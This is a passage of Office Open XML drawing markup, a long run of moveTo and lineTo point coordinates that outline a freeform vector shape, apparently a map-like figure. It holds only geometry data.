                  <a:pt x="14278" y="215"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14221" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14283" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14356" y="359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14443" y="398"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14568" y="430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14646" y="411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14594" y="327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14448" y="234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14344" y="193"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12660" y="225"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12629" y="234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12615" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12599" y="234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12542" y="234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12474" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12556" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12547" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12594" y="308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12634" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12634" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12667" y="266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12712" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12723" y="244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12660" y="225"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11656" y="244"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11624" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11562" y="257"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11453" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11500" y="318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11552" y="318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11562" y="347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11675" y="359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11785" y="347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11831" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11753" y="266"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11656" y="244"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11442" y="295"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11385" y="308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11376" y="337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11319" y="337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11298" y="308"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11194" y="337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11230" y="411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11313" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11376" y="523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11345" y="565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11432" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11479" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11489" y="533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11520" y="523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11536" y="440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11630" y="411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11494" y="337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11442" y="295"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6773" y="369"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6747" y="411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6778" y="430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6721" y="462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6804" y="472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6846" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6903" y="513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6919" y="472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6919" y="420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6841" y="388"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6773" y="369"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14693" y="369"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14672" y="379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14688" y="513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14879" y="472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14863" y="430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14728" y="379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14693" y="369"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7006" y="411"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6985" y="449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6975" y="491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6996" y="513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7063" y="491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7095" y="462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7074" y="420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7053" y="420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7006" y="411"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6509" y="420"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6447" y="449"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6436" y="462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6504" y="462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6561" y="440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6530" y="420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6509" y="420"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="11687" y="449"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11609" y="472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11635" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11614" y="533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11687" y="552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11769" y="513"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11708" y="491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11687" y="449"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6467" y="481"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6405" y="491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6349" y="523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6384" y="565"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6478" y="533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6514" y="501"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6467" y="481"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="7027" y="513"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7022" y="542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7089" y="552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7110" y="552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7121" y="533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7027" y="513"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="6240" y="533"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6177" y="552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6115" y="552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5986" y="616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5861" y="687"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5903" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5975" y="696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6085" y="655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6120" y="645"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6177" y="616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6240" y="533"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="14905" y="542"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14837" y="584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14827" y="626"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14843" y="667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14770" y="667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14714" y="719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14667" y="696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14568" y="706"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14568" y="738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14469" y="748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14417" y="799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14370" y="799"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14356" y="873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14412" y="924"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14330" y="934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14226" y="934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14163" y="953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14215" y="1065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14288" y="1158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14184" y="1097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14097" y="1107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14040" y="1149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14085" y="1232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14033" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14014" y="1107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13967" y="1046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13946" y="1046"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13988" y="1129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13936" y="1200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14024" y="1293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14029" y="1405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14059" y="1466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14111" y="1476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14118" y="1550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14163" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14144" y="1662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14148" y="1723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14106" y="1755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14101" y="1797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14045" y="1774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14080" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14076" y="1527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14003" y="1457"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13962" y="1303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13920" y="1219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13878" y="1190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13889" y="1097"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13859" y="1036"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13739" y="1004"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13713" y="1027"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13718" y="1129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13671" y="1232"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13682" y="1271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13734" y="1364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13734" y="1415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13791" y="1425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13800" y="1447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13863" y="1508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13852" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13656" y="1437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13583" y="1405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13444" y="1373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13433" y="1415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13496" y="1476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13463" y="1550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13397" y="1476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13345" y="1527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13263" y="1527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13241" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13185" y="1559"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13211" y="1489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13173" y="1476"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13039" y="1579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12956" y="1630"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12961" y="1704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12893" y="1723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12853" y="1681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12841" y="1620"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12893" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12858" y="1550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12728" y="1508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12775" y="1579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12764" y="1652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12816" y="1723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12806" y="1806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12754" y="1765"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12712" y="1755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12624" y="1867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12671" y="1960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12634" y="1989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12511" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12485" y="1960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12521" y="2012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12526" y="2073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12485" y="2041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12417" y="2002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12386" y="1826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12297" y="1745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12330" y="1733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12547" y="1826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12615" y="1797"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12655" y="1733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12641" y="1652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12599" y="1601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12407" y="1466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12283" y="1437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12200" y="1364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12158" y="1405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12101" y="1335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12153" y="1303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12007" y="1219"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11934" y="1242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11857" y="1242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11800" y="1335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11727" y="1322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11635" y="1373"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11526" y="1518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11458" y="1611"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11364" y="1835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11287" y="2002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11199" y="2124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11079" y="2227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11039" y="2310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11060" y="2596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11079" y="2730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11147" y="2791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11183" y="2782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11277" y="2637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11313" y="2721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11360" y="2894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11407" y="3039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11410" y="3055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11350" y="3090"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11360" y="3141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11411" y="3212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11426" y="3154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11428" y="3160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11484" y="3151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11510" y="3048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11572" y="3058"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11593" y="2936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11598" y="2721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11645" y="2689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11682" y="2544"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11630" y="2474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11588" y="2390"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11609" y="2217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11692" y="2114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11760" y="2021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11743" y="1951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11779" y="1867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11857" y="1835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11925" y="1887"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11934" y="1938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11909" y="1960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11816" y="2092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11779" y="2166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11764" y="2236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11795" y="2349"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11795" y="2474"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11847" y="2516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11883" y="2586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11960" y="2554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12045" y="2516"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12132" y="2503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12189" y="2567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12142" y="2637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12090" y="2637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12033" y="2618"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11972" y="2637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11915" y="2670"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11925" y="2740"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11960" y="2782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11977" y="2759"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11977" y="2833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11977" y="2926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11934" y="2926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11889" y="2833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11847" y="2875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11826" y="2955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11831" y="3048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11852" y="3151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11785" y="3193"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11774" y="3253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11727" y="3253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11722" y="3221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11671" y="3202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11609" y="3244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11531" y="3305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11500" y="3347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11475" y="3305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11411" y="3253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11385" y="3286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11334" y="3305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11334" y="3263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11282" y="3234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11282" y="3183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11267" y="3119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11298" y="3029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11313" y="3039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11324" y="2987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11298" y="2965"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11293" y="2936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11308" y="2894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11308" y="2833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11272" y="2862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11256" y="2894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11215" y="2904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11199" y="2945"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11194" y="2978"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11199" y="3109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11220" y="3183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11225" y="3253"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11241" y="3305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11209" y="3366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11199" y="3337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11157" y="3347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11147" y="3375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11105" y="3375"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11039" y="3427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10997" y="3622"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10971" y="3655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10930" y="3683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10883" y="3716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10867" y="3818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10743" y="3921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10691" y="3860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10707" y="4014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10619" y="3982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10551" y="4014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10556" y="4107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10639" y="4158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10681" y="4229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10738" y="4383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10728" y="4649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10697" y="4733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10608" y="4733"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10561" y="4742"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10504" y="4723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10432" y="4723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10365" y="4701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10287" y="4794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10308" y="4855"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10302" y="4948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10302" y="4989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10313" y="5041"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10313" y="5102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10297" y="5185"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10292" y="5236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10271" y="5288"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10266" y="5378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10276" y="5429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10302" y="5442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10308" y="5522"/>
                </a:lnTo>
                <a:lnTo>
